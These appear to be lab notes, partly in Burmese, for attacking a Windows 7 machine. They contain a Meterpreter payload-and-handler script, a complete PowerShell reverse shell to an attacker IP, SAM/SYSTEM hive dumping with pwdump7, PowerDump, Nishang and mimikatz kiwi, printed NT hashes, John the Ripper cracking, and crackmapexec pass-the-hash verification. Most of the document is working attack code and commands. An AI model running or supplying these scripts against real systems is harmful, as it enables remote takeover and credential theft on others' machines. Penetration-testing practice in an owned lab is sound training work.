Exploit Windows 7 — lab notes: Meterpreter reverse shell, SAM hash dumping (pwdump7 / reg save / PowerDump / Nishang / kiwi) and offline cracking. Attacker box is 192.168.0.11, the Win7 victim is 192.168.0.152 — keep the two apart in the commands below.

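#!/usr/bin/env bash
# Attacker (Kali) side: build a Meterpreter reverse-TCP payload for the Win7
# box and start the matching multi/handler.
#
# Usage:  ./handler.sh --run [LHOST] [LPORT]    (defaults: 192.168.0.11 4444)
#
# Points the original notes glossed over:
#  - LHOST/LPORT baked into the .exe and configured on the handler MUST match.
#    The notes set LHOST on the handler but relied on the default LPORT; here
#    both are set explicitly from the same variables.
#  - Lines 5-8 of the notes are msfconsole commands, not shell commands; they
#    are passed to msfconsole with -x so the whole thing is one script.
#  - The stock, unencoded stub msfvenom emits is flagged by Defender/any AV;
#    fine for a lab with AV off, nothing more.
set -euo pipefail

readonly PAYLOAD='windows/meterpreter/reverse_tcp'

# Print the msfconsole commands that configure the handler, one per line.
# Kept free of side effects so the command set can be reviewed or tested
# without launching msfconsole.
handler_commands() {
  local lhost=$1 lport=$2
  printf '%s\n' \
    'use exploit/multi/handler' \
    "set PAYLOAD ${PAYLOAD}" \
    "set LHOST ${lhost}" \
    "set LPORT ${lport}" \
    'exploit -j'   # run as a job so the console stays free for `sessions`
}

# Write the payload executable (default name reverse.exe, as in the notes).
gen_payload() {
  local lhost=$1 lport=$2 out=${3:-reverse.exe}
  msfvenom -p "$PAYLOAD" LHOST="$lhost" LPORT="$lport" -f exe -o "$out"
}

# Launch msfconsole with the handler pre-configured; -x takes ';'-joined
# commands and then drops to the interactive prompt.
start_handler() {
  local lhost=$1 lport=$2 cmds
  cmds=$(handler_commands "$lhost" "$lport" | paste -sd ';' -)
  msfconsole -q -x "$cmds"
}

main() {
  local lhost=${1:-192.168.0.11} lport=${2:-4444}
  command -v msfvenom >/dev/null || { printf 'msfvenom not found\n' >&2; exit 1; }
  gen_payload "$lhost" "$lport"
  start_handler "$lhost" "$lport"
}

# Only act when explicitly asked, so the file can also be sourced for its
# helper functions.
if [[ "${1:-}" == '--run' ]]; then
  shift
  main "$@"
fi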

!!!BOOM!!!

![[Recording 20230919064714.webm]]

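# Reverse shell to the attacker with cmd.exe as the interactive process:
# cmd's stdout/stderr are pumped to the socket, socket data is fed to cmd's stdin.
#
# The notes ran this collapsed onto one line:
#   powershell -w hidden -nop -c "<this body on one line>"
# The same body saved as rev.ps1 runs with:
#   powershell -w hidden -nop -ep bypass -File rev.ps1
#
# NOTE(review): the one-liner in the notes was garbled — the Poll() call in the
# disconnect test had been stripped (leaving "-or SelectRead)") and the
# ExitCode test lacked its closing parenthesis. The conditions below are the
# standard form of this snippet; confirm against the original source before use.
# Lab use only: attacker address and port are hard-coded.
$a = '192.168.0.11'   # attacker LHOST
$b = 4444             # attacker LPORT

$c  = New-Object System.Net.Sockets.TcpClient
$nb = New-Object System.Byte[] $c.ReceiveBufferSize   # socket -> cmd stdin
$ob = New-Object System.Byte[] 65536                   # cmd stdout -> socket
$eb = New-Object System.Byte[] 65536                   # cmd stderr -> socket
$e  = New-Object System.Text.UTF8Encoding

# Spawn cmd.exe with all three standard streams redirected.
$p = New-Object System.Diagnostics.Process
$p.StartInfo.FileName = 'cmd.exe'
$p.StartInfo.RedirectStandardInput  = $true
$p.StartInfo.RedirectStandardOutput = $true
$p.StartInfo.RedirectStandardError  = $true
$p.StartInfo.UseShellExecute = $false
$null = $p.Start()
$is = $p.StandardInput
$os = $p.StandardOutput
$es = $p.StandardError

# Start async reads on stdout/stderr; the loop polls IsCompleted.
$osread = $os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null)
$esread = $es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null)

$c.Connect($a, $b)
$s = $c.GetStream()

while ($true) {
    Start-Sleep -Milliseconds 100

    # .Result is only meaningful when BeginRead hands back a Task<int>
    # (.NET 4.5+ base Stream implementation — appears to be the case for the
    # synchronous pipe handles Process creates); on older frameworks it is
    # $null, "-ne 0" is always true, and termination relies on the ExitCode
    # check at the bottom of the loop.
    if ($osread.IsCompleted -and $osread.Result -ne 0) {
        $r = $os.BaseStream.EndRead($osread)
        $s.Write($ob, 0, $r)
        $s.Flush()
        $osread = $os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null)
    }
    if ($esread.IsCompleted -and $esread.Result -ne 0) {
        $r = $es.BaseStream.EndRead($esread)
        $s.Write($eb, 0, $r)
        $s.Flush()
        $esread = $es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null)
    }

    # Anything from the attacker goes straight to cmd's stdin.
    if ($s.DataAvailable) {
        $r = $s.Read($nb, 0, $nb.Length)
        if ($r -lt 1) {
            break
        } else {
            $str = $e.GetString($nb, 0, $r)
            $is.Write($str)
        }
    }

    # Peer closed the socket: Poll(SelectRead) reports readable with 0 bytes pending.
    if ($c.Connected -ne $true -or
        ($c.Client.Poll(1, [System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {
        break
    }
    # cmd.exe has exited (PowerShell surfaces the not-yet-exited getter as $null).
    if ($p.ExitCode -ne $null) {
        break
    }
}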

https://www.tarasco.org/security/pwdump_7/
cmd ကို R-click >> Run as administrator နဲ့ ဖွင့်ပြီးတော့ cd
command ကို သုံးပြီး pwdump7 directory ထဲကို ဝင်ထားပါတယ်။ ပြီးတော့မှ
(Open cmd via right-click >> Run as administrator, cd into the pwdump7 directory, then run PwDump7.exe from that elevated prompt — it will not work from a normal user prompt.)
PwDump7.exe

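REM Save the SAM and SYSTEM hives for offline hash extraction
REM (samdump2, or: impacket-secretsdump -sam sam -system system LOCAL).
REM Both files are needed: the hashes in SAM are encrypted with the boot key
REM that is stored in SYSTEM, so SAM on its own cannot be decoded.
REM Run from an elevated prompt (right-click cmd > Run as administrator);
REM an unprivileged "reg save" fails with "Access is denied".
REM %USERPROFILE% replaces the hard-coded C:\Users\ykh from the notes so the
REM lines work for whichever account is elevated; /y overwrites an earlier
REM copy without prompting. Delete the files when done - they hold credentials.
reg save HKLM\SAM "%USERPROFILE%\Desktop\sam" /y
reg save HKLM\SYSTEM "%USERPROFILE%\Desktop\system" /y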

meterpreter > load powershell            (PowerShell extension — needs a Meterpreter session, not a plain cmd shell)
locate Invoke-PowerDump.ps1              (on Kali: find the Empire copy of PowerDump)

/usr/share/powershell-empire/empire/server/data/module_source/credentials/Invoke-PowerDump.ps1

meterpreter > powershell_import /usr/share/powershell-empire/empire/server/data/module_source/credentials/Invoke-PowerDump.ps1

meterpreter > powershell_execute Invoke-PowerDump   (reads the SAM, so the session needs admin/SYSTEM rights — check getuid, getsystem if needed; no output is recorded here, hence the alternative below)

Alternative: dump the hashes with Nishang's Get-PassHashes instead (the PowerDump run above is not shown producing any output).

locate Get-PassHashes.ps1        (typo in the original notes: "Get-PassHashe.ps1" matches nothing)

sudo apt install nishang         (only needed if locate returns nothing)

powershell_import /usr/share/nishang/Gather/Get-PassHashes.ps1
powershell_execute Get-PassHashes
meterpreter > powershell_execute Get-PassHashes
[+] Command execution completed:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ykh:1000:aad3b435b51404eeaad3b435b51404ee:7244793fc0454da4a1ca80fae09118b2:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:94e54c5b9a75664330dde45320e6c5dc:::
search credential_collector      (msfconsole command — the Meterpreter session must already be backgrounded for this; `background` below really belongs up here)
use 0                            (first search hit — check it is post/windows/gather/credentials/credential_collector)
set SESSION 2                    (the notes never `run` the module after this; add `run` here)
background
load kiwi                        (Meterpreter command again: re-enter the session first with `sessions -i 2`; kiwi = mimikatz)
lsa_dump_sam                     (typically needs SYSTEM — `getsystem` first if it fails; output below shows it worked here)

Collecting hashes...
Administrator:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
HomeGroupUser$:aad3b435b51404eeaad3b435b51404ee:94e54c5b9a75664330dde45320e6c5dc
ykh:aad3b435b51404eeaad3b435b51404ee:7244793fc0454da4a1ca80fae09118b2

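#!/usr/bin/env bash
# Crack the dumped NT hashes offline with John the Ripper.
#
# winhashes holds one pwdump-style line per account, exactly as printed by
# Get-PassHashes above:   user:rid:LMhash:NThash:::
# (create it with `nano winhashes` and paste the lines in).
#
# Things the notes glossed over:
#  - The LM field on every line is aad3b435b51404eeaad3b435b51404ee, the
#    "no LM hash" value, so --format=NT is the right (and only useful) mode.
#  - 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an EMPTY password.
#    Administrator and Guest carry it (they are most likely disabled), so
#    those lines are dropped before cracking — only ykh and HomeGroupUser$
#    are real targets.
#  - The wordlist path in the notes had a typo ("worlists"); on Kali it is
#    /usr/share/wordlists/rockyou.txt and is still gzipped on a fresh
#    install (sudo gunzip /usr/share/wordlists/rockyou.txt.gz).
#
# Usage: ./crack.sh --run [hashfile]    (WORDLIST env var overrides the list)
set -euo pipefail

readonly EMPTY_NT='31d6cfe0d16ae931b73c59d7e0c089c0'

# Filter pwdump lines from the given files (or stdin): drop entries whose NT
# hash is the empty-password hash. Exits 0 even when nothing is left.
drop_empty_passwords() {
  grep -v ":${EMPTY_NT}:::\$" "$@" || true
}

# Run john over the non-empty-password entries of $1 and list the results.
crack_nt() {
  local hashfile=$1
  local wordlist=${WORDLIST:-/usr/share/wordlists/rockyou.txt}
  local targets
  [[ -r "$wordlist" ]] || { printf 'wordlist not readable: %s\n' "$wordlist" >&2; return 1; }
  targets=$(mktemp) || return 1
  trap 'rm -f -- "$targets"' RETURN
  drop_empty_passwords "$hashfile" > "$targets"
  john --format=NT --wordlist="$wordlist" "$targets"
  john --format=NT --show "$targets"    # print what was recovered
}

if [[ "${1:-}" == '--run' ]]; then
  crack_nt "${2:-winhashes}"
fi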

Verify: try the cracked password against the victim over SMB (or pass the NT hash directly with -H) and confirm the account is a local admin.

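#!/usr/bin/env bash
# Validate the recovered credential against the Win7 box over SMB and, when
# the account is a local admin, dump the SAM remotely (--sam needs admin; a
# valid but unprivileged login shows [+] without "Pwn3d!").
#
# Notes for this step:
#  - TARGET is the victim (192.168.0.152 in the notes); 192.168.0.11 used
#    earlier is the attacker/LHOST — do not mix them up.
#  - 'password' is a placeholder for whatever john recovered for ykh.
#  - The NT hash from the dump can be used instead of a password
#    (pass-the-hash): replace -p "$pass" with -H 7244793fc0454da4a1ca80fae09118b2.
#    That proves the dump is usable even if the password never cracks.
#  - crackmapexec takes the secret on the command line, so it lands in shell
#    history and is visible in `ps`; acceptable in a lab, not elsewhere.
#
# Usage: TARGET=... USER_=... PASS=... ./verify.sh --run
set -euo pipefail

verify_smb() {
  local target=$1 user=$2 pass=$3
  crackmapexec smb "$target" -u "$user" -p "$pass" --sam
}

if [[ "${1:-}" == '--run' ]]; then
  verify_smb "${TARGET:-192.168.0.152}" "${USER_:-ykh}" "${PASS:-password}"
fi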